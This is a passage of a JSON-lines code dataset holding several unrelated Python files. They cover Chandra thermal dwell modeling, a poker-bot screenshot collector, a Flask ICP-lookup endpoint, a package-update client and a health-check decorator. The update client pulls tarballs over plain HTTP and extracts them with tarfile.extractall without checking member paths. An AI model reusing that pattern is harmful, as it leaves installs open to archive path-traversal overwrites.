seconds)\n :type t_backoff: float, optional\n :param pseudo: Name of one or more pseudo MSIDs used in the model, if any, only necessary if one wishes to retrieve\n model results for this pseudo node, if it exists. This currently is not used but kept here as a placeholder.\n :type pseudo: str, optional\n :returns:\n - **results** (:py:class:`dict`) - keys are node names (e.g. 'aacccdpt', 'aca0'), values are Xija model\n component objects, this is the same object returned by `run_profile`\n - **times** (:py:class:`np.ndarray`) - time values input into Xija (may not exactly match Xija output)\n - **state_keys** (:py:class:`np.ndarray`) - defines state order, with elements matching the time array output\n (may not exactly match Xija output), this defines where to insert what state\n :rtype: tuple\n\n Notes:\n\n - Keys in state1 must match keys in state2.\n - Keys in state1 must match Xija component names (e.g. 'pitch', 'ccd_count', 'sim_z')\n \"\"\"\n\n num = int(duration / (t_dwell1 + t_dwell2))\n reltimes = np.cumsum([1, t_dwell1 - 1, 1, t_dwell2 - 1] * num)\n times = np.array(reltimes) - reltimes[0] + datesecs - t_backoff\n\n schedule = dict(zip(state1.keys(), []))\n for key, value in state1.items():\n layout = [state1[key], state1[key], state2[key], state2[key]] * num\n schedule[key] = np.array(layout)\n\n state_keys = [1, 1, 2, 2] * num\n state_keys = np.array(state_keys)\n\n model_results = run_profile(times, schedule, msid, model_spec, init, pseudo=pseudo)\n\n return model_results, times, state_keys\n\n\ndef create_opt_fun(datesecs, dwell1_state, dwell2_state, t_dwell1, msid, model_spec, init, t_backoff, duration):\n \"\"\" Generate a Xija model function with preset values, for use with an optimization routine.\n\n :param datesecs: Date for start of simulation, in seconds from '1997:365:23:58:56.816' (cxotime.CxoTime epoch)\n :type datesecs: float or int\n :param dwell1_state: States for fixed dwell (pitch, roll, ccds, etc.)\n :type dwell1_state: dict\n :param dwell2_state: States for variable dwell (pitch, roll, ccds, etc.)\n :type dwell2_state: dict\n :param t_dwell1: Fixed dwell duration in seconds\n :type t_dwell1: float or int\n :param msid: Primary MSID for model being run\n :type msid: str\n :param model_spec: Dictionary of model parameters or file location where parameters can be imported\n :type model_spec: dict, string\n :param init: Dictionary of Xija model initialization parameters\n :type init: dict\n :param t_backoff: Duration for tail end of simulated schedule used to determine convergence, defaults to 10 days\n (in seconds)\n :type t_backoff: float, optional\n :param duration: Duration for entire simulated schedule, defaults to 30 days (in seconds)\n :type duration: float, optional\n :returns: Function generated from specified parameters, to be passed to optimization routine\n :rtype: function\n\n Notes:\n\n - Keys in state1 must match keys in state2.\n - Keys in state1 must match Xija component names (e.g. 'pitch', 'ccd_count', 'sim_z')\n \"\"\"\n\n def opt_binary_schedule(t):\n model_results, _, _ = calc_binary_schedule(datesecs, dwell1_state, dwell2_state, t_dwell1, t, msid,\n model_spec, init, duration=duration, t_backoff=t_backoff)\n\n model_temps = model_results[msid].mvals\n model_times = model_results[msid].times\n ind = model_times > (model_times[-1] - t_backoff)\n dmax = np.max(model_temps[ind])\n dmin = np.min(model_temps[ind])\n dmean = np.mean(model_temps[ind])\n\n return t, dmax, dmean, dmin\n\n return opt_binary_schedule\n\n\ndef find_second_dwell(date, dwell1_state, dwell2_state, t_dwell1, msid, limit, model_spec, init, limit_type='max',\n duration=2592000, t_backoff=1725000, n_dwells=10, min_dwell=None, max_dwell=None, pseudo=None):\n \"\"\" Determine the required dwell time at pitch2 to balance a given fixed dwell time at pitch1, if any exists.\n\n :param date: Date for start of simulation, in seconds from '1997:365:23:58:56.816' (cxotime.CxoTime epoch) or any\n other format readable by cxotime.CxoTime\n :type date: float or int or str\n :param dwell1_state: States for fixed dwell (pitch, roll, ccds, etc.)\n :type dwell1_state: dict\n :param dwell2_state: States for variable dwell (pitch, roll, ccds, etc.)\n :type dwell2_state: dict\n :param t_dwell1: Fixed dwell duration in seconds\n :type t_dwell1: float or int\n :param msid: Primary MSID for model being run\n :type msid: str\n :param limit: Temperature limit for primary MSID in model for this simulation\n :type limit: float\n :param model_spec: Dictionary of model parameters or file location where parameters can be imported\n :type model_spec: dict, string\n :param init: Dictionary of Xija model initialization parameters\n :type init: dict\n :param limit_type: Type of limit, defaults to 'max' (a maximum temperature limit), other option is 'min'\n :type limit_type: str, optional\n :param duration: Duration for entire simulated schedule, defaults to 30 days (in seconds)\n :type duration: float, optional\n :param t_backoff: Duration for tail end of simulated schedule used to determine convergence, defaults to 10 days\n (in seconds)\n :type t_backoff: float, optional\n :param n_dwells: Number of second dwell, `t_dwell2`, possibilities to run (more dwells = finer resolution)\n :type n_dwells: int, optional\n :param min_dwell: Minimum duration for second dwell, can be used if the user wants to narrow the dwell time search,\n defaults to 1.0e-6s\n :type min_dwell: float, optional\n :param max_dwell: Maximum duration for second dwell, can be used if the user wants to narrow the dwell time search\n :type max_dwell: float, optional\n :param pseudo: Name of one or more pseudo MSIDs used in the model, if any, only necessary if one wishes to retrieve\n model results for this pseudo node, if it exists. This currently is not used but kept here as a placeholder.\n :type pseudo: str, optional\n :returns: Dictionary of results information\n :rtype: dict\n \"\"\"\n\n datesecs = CxoTime(date).secs\n msid = msid.lower()\n\n if 'max' in limit_type.lower():\n limit_type = 'max'\n else:\n limit_type = 'min'\n\n if max_dwell is None:\n # This ensures three \"cycles\" of the two dwell states, within the portion of the schedule used for evaluation\n # (t_backoff).\n # Subtract 1000 sec for extra padding.\n max_dwell = (t_backoff - t_dwell1) / 3 - 1000\n\n if min_dwell is None:\n min_dwell = 1.0e-6\n\n results = {'converged': False, 'unconverged_hot': False, 'unconverged_cold': False,\n 'min_temp': np.nan, 'mean_temp': np.nan, 'max_temp': np.nan, 'temperature_limit': limit,\n 'dwell_2_time': np.nan, 'min_pseudo': np.nan, 'mean_pseudo': np.nan, 'max_pseudo': np.nan,\n 'hotter_state': np.nan, 'colder_state': np.nan}\n\n # Ensure t_dwell1 is a float, may not be necessary anymore\n t_dwell1 = float(t_dwell1)\n\n opt_fun = create_opt_fun(datesecs, dwell1_state, dwell2_state, t_dwell1, msid, model_spec, init, t_backoff,\n duration)\n\n # First just check the bounds to avoid unnecessary runs of `opt_fun`\n output = np.array([opt_fun(t) for t in [min_dwell, max_dwell]],\n dtype=[('duration2', float), ('max', float), ('mean', float), ('min', float)])\n\n if 'max' in limit_type:\n\n # All cases report temperatures entirely below the limit.\n if np.all(output['max'] < limit):\n results = _handle_unconverged_cold(output, results)\n\n # All cases report temperatures entirely above the limit.\n elif np.all(output['max'] > limit):\n results = _handle_unconverged_hot(output, results)\n\n # Temperatures straddle the limit, so a refined dwell 2 time is possible.\n else:\n results, output = _refine_dwell2_time('max', n_dwells, min_dwell, max_dwell, limit, opt_fun, results)\n\n elif 'min' in limit_type:\n\n # All cases report temperatures entirely below the limit.\n if np.all(output['min'] < limit):\n results = _handle_unconverged_cold(output, results)\n\n # All cases report temperatures entirely above the limit.\n elif np.all(output['min'] > limit):\n results = _handle_unconverged_hot(output, results)\n\n # Temperatures straddle the limit, so a refined dwell 2 time is possible.\n else:\n results, output = _refine_dwell2_time('min', n_dwells, min_dwell, max_dwell, limit, opt_fun, results)\n\n if output['max'][0] > output['max'][-1]:\n results['hotter_state'] = 1\n results['colder_state'] = 2\n else:\n results['hotter_state'] = 2\n results['colder_state'] = 1\n\n return results\n\n\ndef _handle_unconverged_hot(output, results):\n \"\"\" Record useful information for the case where all output remains above the limit.\n\n This is intended to be run solely by find_second_dwell(). This modifies the `results` dictionary inherited from the\n parent function to provide information about the case that came the closest to converging.\n\n :param output: Numpy array of maximum, mean, and minimum temperatures for each simulation generated, within the last\n `t_backoff` duration (e.g. the last two thirds of `duration`) for the final refinement step.\n :type output: np.ndarray\n :param results: Results dictionary initialized in parent function\n :type results: dict\n :returns: Dictionary of results information\n :rtype: dict\n \"\"\"\n\n # You want the data for the case that is closest to the limit, in this case that is the data with the min value.\n ind = np.argmin(output['min'])\n results['unconverged_hot'] = True\n results['dwell_2_time'] = np.nan\n results['max_temp'] = output['max'][ind]\n results['min_temp'] = output['min'][ind]\n results['mean_temp'] = output['mean'][ind]\n results['converged'] = False\n\n return results\n\n\ndef _handle_unconverged_cold(output, results):\n \"\"\" Record useful information for the case where all output remains below the limit.\n\n This is intended to be run solely by find_second_dwell(). This modifies the `results` dictionary inherited from the\n parent function to provide information about the case that came the closest to converging.\n\n :param output: Numpy array of maximum, mean, and minimum temperatures for each simulation generated, within the last\n `t_backoff` duration (e.g. the last two thirds of `duration`) for the final refinement step.\n :type output: np.ndarray\n :param results: Results dictionary initialized in parent function\n :type results: dict\n :returns: Dictionary of results information\n :rtype: dict\n \"\"\"\n\n # You want the data for the case that is closest to the limit, in this case that is the data with the max value.\n ind = np.argmax(output['max'])\n results['unconverged_cold'] = True\n results['dwell_2_time'] = np.nan\n results['max_temp'] = output['max'][ind]\n results['min_temp'] = output['min'][ind]\n results['mean_temp'] = output['mean'][ind]\n results['converged'] = False\n\n return results\n\n\ndef _refine_dwell2_time(limit_type, n_dwells, min_dwell, max_dwell, limit, opt_fun, results):\n \"\"\" Refine the required dwell time at pitch2 to balance a given fixed dwell time at pitch1.\n\n This is intended to be run solely by find_second_dwell() to refine the amount of dwell 2 time is necessary to\n balance the dwell 1 time. This modifies the `results` dictionary inherited from the parent function, but also\n returns the `output` ndarray containing data from the final refinement operation.\n\n :param limit_type: Type of limit, either a minimum or maximum temperature limit (needs to have 'min' or 'max' in\n string passed to this argument\n :type limit_type: str\n :param n_dwells: Number of second dwell possibilities to run (more dwells = finer resolution)\n :type n_dwells: int\n :param min_dwell: Minimum duration for second dwell, can be used if the user wants to narrow the dwell time search,\n defaults to 1.0e-6s\n :type min_dwell: float\n :param max_dwell: Maximum duration for second dwell, can be used if the user wants to narrow the dwell time search\n :type max_dwell: float\n :param limit: Limit in Celsius for current simulation\n :type limit: float\n :param opt_fun: Function that runs the schedule defined by dwell1_state and dwell2_state\n :type opt_fun: function\n :param results: Results dictionary initialized in parent function\n :type results: dict\n :returns:\n - results (:py:class:`dict`) - Dictionary of results information\n - times (:py:class:`np.ndarray`) - Numpy array of maximum, mean, and minimum temperatures for each simulation\n generated, within the last`t_backoff` duration (e.g. the last two thirds of `duration`) for the final\n refinement step.\n \"\"\"\n\n # This is the configuration for working with a max temperature limit (as opposed to a min temperature limit).\n max_min = 'max'\n min_max = 'min'\n\n if 'min' in limit_type:\n max_min = 'min'\n min_max = 'max'\n\n # dwell2_range defines the possible dwell 2 guesses, first defined in log space\n dwell2_range = np.logspace(1.0e-6, 1, n_dwells, endpoint=True) / n_dwells\n dwell2_range = min_dwell + \\\n (max_dwell - min_dwell) * (dwell2_range - dwell2_range[0]) / (dwell2_range[-1] - dwell2_range[0])\n\n # Run the dwell1_state-dwell2_state schedule using the possible dwell 2 guesses\n output = np.array([opt_fun(t) for t in dwell2_range], dtype=[('duration2', float), ('max', float),\n ('mean', float), ('min', float)])\n\n # Ensure the results are sorted. Although dwell2_range will be sorted, the output may not when two or more dwell\n # times are close, where temperature oscillations from instabilities in the Xija model can cause the results to lose\n # this order.\n #\n # The column that is used to sort the results also depends on the limit type.\n output_sorted = np.sort(output, order=max_min)\n ind = np.searchsorted(output_sorted[max_min], limit)\n\n if ind == 0:\n # np.searchsorted finds the first suitable location by default, so if ind == 0, then the duration must\n # fall at the bounded value. This is not true if ind == -1 (the last value).\n results[max_min + '_temp'] = limit\n results['dwell_2_time'] = output['duration2'][ind]\n results[min_max + '_temp'] = output[min_max][ind]\n results['mean_temp'] = output['mean'][ind]\n results['converged'] = True\n\n else:\n t_bound = (output_sorted['duration2'][ind - 1], output_sorted['duration2'][ind])\n dwell2_range = np.linspace(np.min(t_bound), np.max(t_bound), n_dwells, endpoint=True)\n output = np.array([opt_fun(t) for t in dwell2_range],\n dtype=[('duration2', float), ('max', float), ('mean', float),\n ('min', float)])\n\n # In rare conditions where all 'x' values are very close and 'wobble' a bit, it may not be sorted. If it\n # is not sorted, the quadratic method will result in an error. The linear method is more tolerant of this\n # condition. Additionally, the quadratic has a tendency to produce some really weird results even when the\n # data appears sensible.\n f_dwell_2_time = interpolate.interp1d(output[max_min], output['duration2'], kind='linear', assume_sorted=False)\n f_non_limit_temp = interpolate.interp1d(output[max_min], output[min_max], kind='linear', assume_sorted=False)\n f_mean_temp = interpolate.interp1d(output[max_min], output['mean'], kind='linear', assume_sorted=False)\n\n results[max_min + '_temp'] = limit\n results['dwell_2_time'] = f_dwell_2_time(limit).item()\n results['mean_temp'] = f_mean_temp(limit).item()\n results[min_max + '_temp'] = f_non_limit_temp(limit).item()\n\n results['converged'] = True\n\n return results, output\n\n\ndef run_state_pairs(msid, model_spec, init, limit, date, dwell_1_duration, state_pairs, limit_type='max',\n min_dwell=None, max_dwell=None, n_dwells=10, print_progress=True, shared_data=None):\n \"\"\" Determine dwell balance times for a set of cases.\n\n :param msid: Primary MSID for model being run\n :type msid: str\n :param model_spec: Dictionary of model parameters or file location where parameters can be imported\n :type model_spec: dict, string\n :param init: Dictionary of Xija model initialization parameters\n :type init: dict\n :param limit: Temperature limit for primary MSID in model for this simulation\n :type limit: float\n :param date: Date for start of simulation, in seconds from '1997:365:23:58:56.816' (cxotime.CxoTime epoch) or any\n other format readable by cxotime.CxoTime\n :type date: float or int or str\n :param dwell_1_duration: Duration in seconds of dwell 1, also viewed as the known or defined dwell duration, for\n which one wants to find a complementary dwell duration (dwell duration 2)\n :type dwell_1_duration: float or int\n :param state_pairs: Iterable of dictionary pairs, where each pair of dictionaries contain dwell1 and dwell2 states,\n see state_pair section below for further details\n :type state_pairs: list or tuple\n :param limit_type: Type of limit, defaults to 'max' (a maximum temperature limit), other option is 'min'\n :type limit_type: str, optional\n :param min_dwell: Minimum duration for second dwell, can be used if the user wants to narrow the dwell time search,\n defaults to 1.0e-6s\n :type min_dwell: float\n :param max_dwell: Maximum duration for second dwell, can be used if the user wants to narrow the dwell time search\n :type max_dwell: float\n :param n_dwells: Number of second dwell, `t_dwell2`, possibilities to run (more dwells = finer resolution)\n :type n_dwells: int, optional\n :param shared_data: Shared list of results, used when running multiple `run_state_pairs` threads in parallel via\n the multiprocessing package\n :type shared_data: multiprocessing.managers.ListProxy, optoinal\n :returns: Structured numpy array of results\n :rtype: np.ndarray\n\n State Pairs Data Structure:\n\n The state pairs data structure, `state_pairs`, are pairs of dictionaries specifying the two conditions used for a\n Timbre simulation. The keys in these dictionaries must match the Xija component names they refer to (e.g. 'pitch',\n 'ccd_count', 'cossrbx_on', etc.).\n\n State information that does not change from dwell1 to dwell2 can be specified in the model initialization\n dictionary. `init`. State information that does change from dwell1 to dwell2 should be specified in the state pairs\n dictionary described above. Dictionary names for states should match those expected by Xija (e.g. fep_count, roll,\n sim_z).\n\n Example::\n\n model_init = {'aacccdpt': {'aacccdpt': -7., 'aca0': -7., 'eclipse': False}, }\n model_specs = load_model_specs()\n date = '2021:001:00:00:00'\n t_dwell1 = 20000.\n msid = 'aacccdpt'\n limit = -7.1\n state_pairs = (({'pitch': 144.2}, {'pitch': 154.95}),\n ({'pitch': 90.2}, {'pitch': 148.95}),\n ({'pitch': 50}, {'pitch': 140}),\n ({'pitch': 90}, {'pitch': 100}),\n ({'pitch': 75}, {'pitch': 130}),\n ({'pitch': 170}, {'pitch': 90}),\n ({'pitch': 90}, {'pitch': 170}))\n state_pair_dtype = {'pitch', float}\n\n results = run_state_pairs(msid, model_specs[msid], model_init[msid], limit, date, t_dwell1, state_pairs,\n state_pair_dtype)\n \"\"\"\n\n non_state_names = {'aacccdpt': ['aca0', ],\n 'pftank2t': ['pf0tank2t', ],\n '4rt700t': ['oba0', ],\n 'pline03t': ['pline03t0', ],\n 'pline04t': ['pline04t0', ],\n 'pm1thv2t': ['mups0', ],\n 'pm2thv1t': ['mups0', 'mups1'],\n '1deamzt': ['dea0', ],\n '1dpamzt': ['dpa0', ],\n 'fptemp': ['fptemp', '1cbat', 'sim_px'],\n '1pdeaat': ['pin1at', ],\n '2ceahvpt': ['cea0', 'cea1']}\n\n base_dtype = [('msid', 'U20'),\n ('date', 'U8'),\n ('datesecs', float),\n ('limit', float),\n ('t_dwell1', float),\n ('t_dwell2', float),\n ('min_temp', float),\n ('mean_temp', float),\n ('max_temp', float),\n ('min_pseudo', float),\n ('mean_pseudo', float),\n ('max_pseudo', float),\n ('converged', bool),\n ('unconverged_hot', bool),\n ('unconverged_cold', bool),\n ('hotter_state', np.int8),\n ('colder_state', np.int8)]\n\n duration = 30 * 24 * 3600.\n t_backoff = 2 * duration / 3\n datestr = CxoTime(date).date[:8]\n datesecs = CxoTime(date).secs\n msid = msid.lower()\n\n results = []\n\n num = float(len(state_pairs))\n for n, pair in enumerate(state_pairs):\n\n if print_progress and (np.mod(n, 1000) == 0):\n print(\"Running simulations for state pair #: {} out of {}\".format(n + 1, num))\n\n dwell1_state = pair[0]\n dwell2_state = pair[1]\n\n dwell_results = find_second_dwell(date, dwell1_state, dwell2_state, dwell_1_duration, msid, limit, model_spec,\n init, limit_type=limit_type, duration=duration, t_backoff=t_backoff,\n n_dwells=n_dwells, min_dwell=min_dwell, max_dwell=max_dwell, pseudo=None)\n\n row = [msid.encode('utf-8'),\n datestr.encode('utf-8'),\n datesecs,\n limit,\n dwell_1_duration,\n dwell_results['dwell_2_time'],\n dwell_results['min_temp'],\n dwell_results['mean_temp'],\n dwell_results['max_temp'],\n dwell_results['min_pseudo'],\n dwell_results['mean_pseudo'],\n dwell_results['max_pseudo'],\n dwell_results['converged'],\n dwell_results['unconverged_hot'],\n dwell_results['unconverged_cold'],\n dwell_results['hotter_state'],\n dwell_results['colder_state']]\n\n for key, value in init.items():\n if key not in non_state_names[msid] and key not in dwell1_state and key not in msid:\n dwell1_state[key] = value\n dwell2_state[key] = value\n\n state_dtype = []\n for key, value in dwell1_state.items():\n row.append(value)\n state_dtype.append((key.lower() + '1', type(value)))\n\n for key, value in dwell2_state.items():\n row.append(value)\n state_dtype.append((key.lower() + '2', type(value)))\n\n results.append(tuple(row))\n\n dtype = base_dtype + state_dtype\n results_array = np.array(results, dtype=dtype)\n\n if shared_data is not None:\n shared_data.append(results_array)\n else:\n return results_array\n","sub_path":"timbre/timbre.py","file_name":"timbre.py","file_ext":"py","file_size_in_byte":38621,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"31305265","text":"import mss\nimport mss.tools\nimport uuid\nimport time\n\nif __name__ == \"__main__\":\n with mss.mss() as sct:\n monitor1 = {'top':828, 'left':1180, 'width':30, 'height':72}\n monitor2 = {'top':828, 'left':1285, 'width':30, 'height':72}\n monitor3 = {'top':540, 'left':1005, 'width':30, 'height':72}\n monitor4 = {'top':540, 'left':1119, 'width':30, 'height':72}\n monitor5 = {'top':540, 'left':1233, 'width':30, 'height':72}\n monitor6 = {'top':540, 'left':1347, 'width':30, 'height':72}\n monitor7 = {'top':540, 'left':1461, 'width':30, 'height':72}\n\n for i in range (508, 10000):\n sct_1 = sct.grab(monitor1)\n sct_2 = sct.grab(monitor2)\n sct_3 = sct.grab(monitor3)\n sct_4 = sct.grab(monitor4)\n sct_5 = sct.grab(monitor5)\n sct_6 = sct.grab(monitor6)\n sct_7 = sct.grab(monitor7)\n\n mss.tools.to_png(sct_1.rgb, sct_1.size, output='C:/Users/Devin/Desktop/PokerBot/CardsImages/Hole_Card_{}.png'.format(i*7-7))\n mss.tools.to_png(sct_2.rgb, sct_2.size, output='C:/Users/Devin/Desktop/PokerBot/CardsImages/Hole_Card_{}.png'.format(i*7-6))\n mss.tools.to_png(sct_3.rgb, sct_3.size, output='C:/Users/Devin/Desktop/PokerBot/CardsImages/Hole_Card_{}.png'.format(i*7-5))\n mss.tools.to_png(sct_4.rgb, sct_4.size, output='C:/Users/Devin/Desktop/PokerBot/CardsImages/Hole_Card_{}.png'.format(i*7-4))\n mss.tools.to_png(sct_5.rgb, sct_5.size, output='C:/Users/Devin/Desktop/PokerBot/CardsImages/Hole_Card_{}.png'.format(i*7-3))\n mss.tools.to_png(sct_6.rgb, sct_6.size, output='C:/Users/Devin/Desktop/PokerBot/CardsImages/Hole_Card_{}.png'.format(i*7-2))\n mss.tools.to_png(sct_7.rgb, sct_7.size, output='C:/Users/Devin/Desktop/PokerBot/CardsImages/Hole_Card_{}.png'.format(i*7-1))\n print (\"Taking screenshots\") \n time.sleep(20)\n","sub_path":"RecognitionDataCollector.py","file_name":"RecognitionDataCollector.py","file_ext":"py","file_size_in_byte":1941,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"70254105","text":"from flask import Blueprint, jsonify\nfrom webargs.flaskparser import use_args\n\nfrom project.api.bizs import IcpBiz\nfrom project.api.schemas.icp import query_icp_schema\n\nicp_blueprint = Blueprint('icp', __name__)\npayload_location = ('json',)\n\n\n@icp_blueprint.route('/icp/captcha', methods=['GET'])\ndef get_icp_captcha():\n icp_biz = IcpBiz()\n data = icp_biz.get_captcha()\n return jsonify({\n 'status': True,\n 'data': data\n }), 200\n\n\n@icp_blueprint.route('/icp/query', methods=['POST'])\n@use_args(query_icp_schema, locations=payload_location)\ndef query_icp(payload):\n \"\"\"查询备案信息:先查工信部|若工信部出错查本地库\"\"\"\n\n icp_biz = IcpBiz()\n result = icp_biz.query(**payload)\n print(\"备案查询结果为:\", result)\n\n # 查备案信息成功 | 用备案单位识别归属地信息\n result['data'] = result.get('data', {})\n if result['data'].get('sponsor', '') and result['data'].get('sponsor') != '未备案':\n area = icp_biz.recognize_area(result['data']['sponsor'])\n else:\n area = {'city': '', 'city_code': None, 'region': '', 'region_code': None}\n print(\"识别的归属地信息为:\", area)\n result['data'].update(area)\n return jsonify({\n 'status': True,\n 'data': result\n }), 201\n","sub_path":"project/api/views/icp.py","file_name":"icp.py","file_ext":"py","file_size_in_byte":1305,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"204551181","text":"import json\nimport platform\nimport requests\nimport psutil\nimport shutil\nimport os\nimport tarfile\nimport time\nimport sys\nfrom distutils.version import LooseVersion\nfrom UpdateInfo import PackageInfo, ClientInfo\nfrom threading import Thread\n\nserver_url = \"http://localhost:5000\"\ninternal_id = -1\nclient_active = False\nroot_path = os.path.dirname(os.path.realpath(sys.argv[0]))\ninstallDir = os.path.abspath(os.path.join(root_path, '..', 'download'))\n\ninstalledPackages = dict()\n\ninstalledPackages[\"TextEdit_x86_64\"] = PackageInfo(\"TextEdit\", \"A simple text editor\", \"1.1.2\")\ninstalledPackages[\"MediaPlayer_x86_64\"] = PackageInfo(\"MediaPlayer\", \"A simple media player\", \"0.9.5\")\ninstalledPackages[\"lib_media_x86_64\"] = PackageInfo(\"lib_media\", \"basic media de- and encoding functions\", \"0.2.1\")\n\nfor pkg in installedPackages.values():\n pkg.architecture = \"x86_64\"\n\n\ndef register_client():\n \"\"\"\n Registers this client with the server and saves the provided client-id \n \"\"\"\n global internal_id\n headers = {'Content-type': 'application/json'}\n payload = ClientInfo(platform.platform(),\n platform.processor() + \" (\"+str(psutil.cpu_count())+\" cores)\",\n str(round(float(psutil.virtual_memory()[0])/(1024*1024*1024), 2)) + \" GB\",\n platform.machine(),\n internal_id).__dict__\n r = requests.put(server_url + \"/registerClient\", headers=headers, data=json.dumps(payload))\n if r.status_code != 200:\n print(\"ERROR\", r.status_code, r.reason)\n return\n if internal_id == -1:\n print(\"\\nsuccessfully registered with server at \"+server_url)\n internal_id = r.json()\n\n\ndef get_package_list():\n \"\"\"\n Requests the list of available server packages and prints them \n \"\"\"\n headers = {'Content-type': 'application/json'}\n payload = json.dumps(internal_id)\n r = requests.get(server_url + \"/packages\", headers=headers, data=payload)\n if r.status_code != 200:\n print(\"ERROR\", r.status_code, r.reason)\n return\n pkg_list = json.loads(r.json())\n for obj in pkg_list:\n p = PackageInfo.from_dict(obj)\n print(p.name, p.version, p.dependencies, p.architecture)\n\n\ndef request_updates():\n \"\"\"\n Requests the list of available updates, based on the currently installed packages\n \"\"\"\n headers = {'Content-type': 'application/json'}\n payload = json.dumps([ob.__dict__ for ob in installedPackages.values()])\n r = requests.get(server_url + \"/requestUpdates\", headers=headers, data=json.dumps([internal_id, payload]))\n\n if r.status_code != 200:\n print(\"ERROR\", r.status_code, r.reason)\n return\n print(\"Available Updates:\")\n try:\n pkg_list = json.loads(r.json())\n for obj in pkg_list:\n p = PackageInfo.from_dict(obj)\n print(p.name, p.version, p.dependencies)\n except ValueError:\n print(\"error\")\n\n\ndef request_package(name, indent=\"\"):\n \"\"\"\n Requests a specific package from the server, downloads it and installs it to the 'downloads' directory.\n Does NOT check whether the package is already installed. Overwrites installed version of the package.\n :param name: the package name\n :param indent: indentation string, used for cleaner output in recursive dependency requests\n \"\"\"\n global installedPackages\n key_name = name + \"_\" + platform.machine()\n print(indent+\"requesting '\" + key_name + \"'\")\n headers = {'Content-type': 'application/json'}\n payload = json.dumps(name+\"_\"+platform.machine())\n r = requests.get(server_url + \"/requestPackage\", headers=headers, data=json.dumps([internal_id, payload]), stream=True)\n\n if r.status_code == 200:\n\n dependencies = json.loads(r.headers['required-dependencies'])\n for dep in dependencies:\n req_v = dep.split(\",\")\n if len(req_v) > 1:\n req = req_v[1]\n dep = req_v[0]\n try:\n p_key = dep+\"_\"+platform.machine()\n\n if installedPackages[p_key]:\n if len(req_v) > 1:\n if req.startswith(\">=\"):\n need_update = LooseVersion(req.replace(\">=\", \"\")) > LooseVersion(installedPackages[p_key].version)\n elif req.startswith(\">\"):\n need_update = LooseVersion(req.replace(\">\", \"\")) >= LooseVersion(installedPackages[p_key].version)\n else:\n print(indent+\" unable to parse version requirement\",\n \"'\" + req + \"'. assuming package is outdated\")\n if not request_package(dep, \" \"+indent):\n print(indent+\"installation of '\" + name + \"'failed\")\n return False\n break\n if need_update:\n print(indent+\" required dependency '\" + dep + \"' needs update:\",\n installedPackages[p_key].version, \"is not\", req)\n if not request_package(dep, \" \"+indent):\n print(indent+\"installation of '\" + name + \"'failed\")\n return False\n else:\n print(indent+\" required dependency '\" + dep + \"' already installed!\")\n else:\n print(indent + \" required dependency '\" + dep + \"' already installed!\")\n except KeyError:\n print(indent+\" required dependency '\" + dep + \"' not installed\")\n if not request_package(dep, \" \" + indent):\n print(indent+\"installation of '\" + name + \"'failed\")\n return False\n\n down_dir = installDir\n file_name = r.headers['content-disposition']\n pkg_dir = os.path.join(down_dir, name)\n full_path = os.path.join(down_dir, file_name)\n\n version = r.headers['package-version']\n desc = r.headers['package-description']\n\n if not os.path.exists(down_dir):\n os.makedirs(down_dir)\n\n if os.path.exists(pkg_dir):\n shutil.rmtree(pkg_dir)\n\n os.makedirs(pkg_dir)\n\n with open(full_path, 'wb') as f:\n r.raw.decode_content = True\n shutil.copyfileobj(r.raw, f)\n\n print(indent+\" downloaded '\" + name + \"'\")\n\n tar = tarfile.open(full_path)\n tar.extractall(pkg_dir)\n tar.close()\n os.remove(full_path)\n\n installedPackages[key_name] = PackageInfo(name, desc, version)\n installedPackages[key_name].architecture = platform.machine()\n print(indent+\"successfully installed '\" + name + \"' to\", pkg_dir)\n return True\n else:\n print(indent+\"error trying to fetch package\")\n return False\n\n\ndef heartbeat():\n \"\"\"\n Periodically sends a heartbeat to the server\n \"\"\"\n global client_active\n ms = 100.0\n while client_active:\n ms_wait = 0.0\n while ms_wait < 8000.0:\n time.sleep(ms/1000.0)\n ms_wait += ms\n if not client_active:\n return\n register_client()\n\n\nif __name__ == '__main__':\n\n # read server address from arguments if provided\n if len(sys.argv) == 2:\n host = str(sys.argv[1])\n server_url = \"http://\"+host+\":5000\"\n print(\"set url to \" + server_url)\n\n # initially register this client with the server\n register_client()\n\n # start heartbeat thread\n client_active = True\n t = Thread(target=heartbeat)\n t.start()\n\n # read commands from the console until interrupt or 'exit' command\n while True:\n try:\n if sys.version_info >= (3, 0):\n response = input(\"Please enter a command: \")\n else:\n response = raw_input(\"Please enter a command: \")\n if response == \"auto\":\n \"\"\"\n demo-behavior:\n - fetch package -list\n - fetch updates\n - request \"WebBrowser\"-package\n - request \"MediaPlayer\"-package\n \"\"\"\n get_package_list()\n request_updates()\n request_package(\"WebBrowser\")\n request_package(\"MediaPlayer\")\n elif response == \"update\":\n request_updates()\n elif response == \"getpkgs\":\n get_package_list()\n elif response.startswith(\"request\"):\n package_name = response[len(\"request \"):]\n request_package(package_name)\n elif response == \"exit\":\n break\n elif response == \"help\":\n print(\"commands:\")\n print(\"auto\\ngetpkgs\\nrequest [pkgname]\\nupdate\\nexit\\nhelp\")\n except KeyboardInterrupt:\n print(\"\\nexiting\")\n break\n except Exception as e:\n print(\"Unexpected error:\", e)\n break\n\n client_active = False\n t.join()\n\n","sub_path":"src/Client.py","file_name":"Client.py","file_ext":"py","file_size_in_byte":9166,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"407940978","text":"from functools import wraps\nimport time\nimport requests\n\n\ndef check_cmc():\n cmcurl = 'csgcmc.qa.webex.com'\n try:\n res = requests.get(f\"https://{cmcurl}/cmc/api/healthcheck/\").json()\n ret = res['result']\n except Exception as e:\n # print(f\"CMC {cmcurl} is not available due to {e}\")\n ret = \"NONONO\"\n if ret == \"OKOKOK\":\n return True\n else:\n return False\n\n\ndef is_cmc_available(func):\n @wraps(func)\n def wrapper(*args, **kwargs):\n print(\"checking cmc ...\")\n cmcurl = args[0]\n try:\n res = requests.get(f\"https://{cmcurl}/cmc/api/healthcheck/\").json()\n ret = res['result']\n except Exception as e:\n # print(f\"CMC {cmcurl} is not available due to {e}\")\n ret = \"NONONO\"\n if ret != \"OKOKOK\":\n print(\"cmc error\")\n else:\n func(*args, **kwargs)\n\n return wrapper\n\n\n@is_cmc_available\ndef test(cmculr, x):\n print(f\"sleep1 {x}...\")\n time.sleep(x)\n print(\"sleep2...\")\n\n\ntest('csgcmc.qa.webex.com1', 